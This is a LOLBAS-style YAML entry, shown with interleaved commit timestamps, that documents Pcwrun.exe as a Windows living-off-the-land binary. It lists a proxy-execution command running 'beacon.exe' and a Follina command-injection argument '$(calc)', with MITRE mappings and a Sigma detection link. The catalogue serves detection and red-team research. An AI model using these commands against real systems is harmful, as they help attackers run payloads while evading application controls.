2018-06-09 00:15:06 +02:00
---
Name : Pcwrun.exe
2018-09-24 21:59:43 +02:00
Description : Program Compatibility Wizard
Author : 'Oddvar Moe'
2021-01-10 16:04:52 +01:00
Created : 2018-05-25
2018-06-09 00:15:06 +02:00
Commands :
- Command : Pcwrun.exe c:\temp\beacon.exe
Description : Open the target .EXE file with the Program Compatibility Wizard.
2018-09-24 21:59:43 +02:00
Usecase : Proxy execution of binary
Category : Execute
Privileges : User
MitreID : T1218
2021-12-14 16:50:17 +01:00
OperatingSystem : Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
2022-11-11 17:42:44 +01:00
- Command : Pcwrun.exe /../../$(calc).exe
Description : Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase : Proxy execution of binary
Category : Execute
Privileges : User
MitreID : T1202
OperatingSystem : Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
2018-12-10 14:28:12 +01:00
Full_Path :
2018-09-24 21:59:43 +02:00
- Path : C:\Windows\System32\pcwrun.exe
Detection :
2022-11-11 17:42:44 +01:00
- Sigma : https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml
2018-06-09 00:15:06 +02:00
Resources :
2018-09-24 21:59:43 +02:00
- Link : https://twitter.com/pabraeken/status/991335019833708544
2022-11-11 17:42:44 +01:00
- Link : https://twitter.com/nas_bench/status/1535663791362519040
2018-09-24 21:59:43 +02:00
Acknowledgement :
- Person : Pierre-Alexandre Braeken
Handle : '@pabraeken'
2022-11-11 17:42:44 +01:00
- Person : Nasreddine Bencherchali
Handle : '@nas_bench'
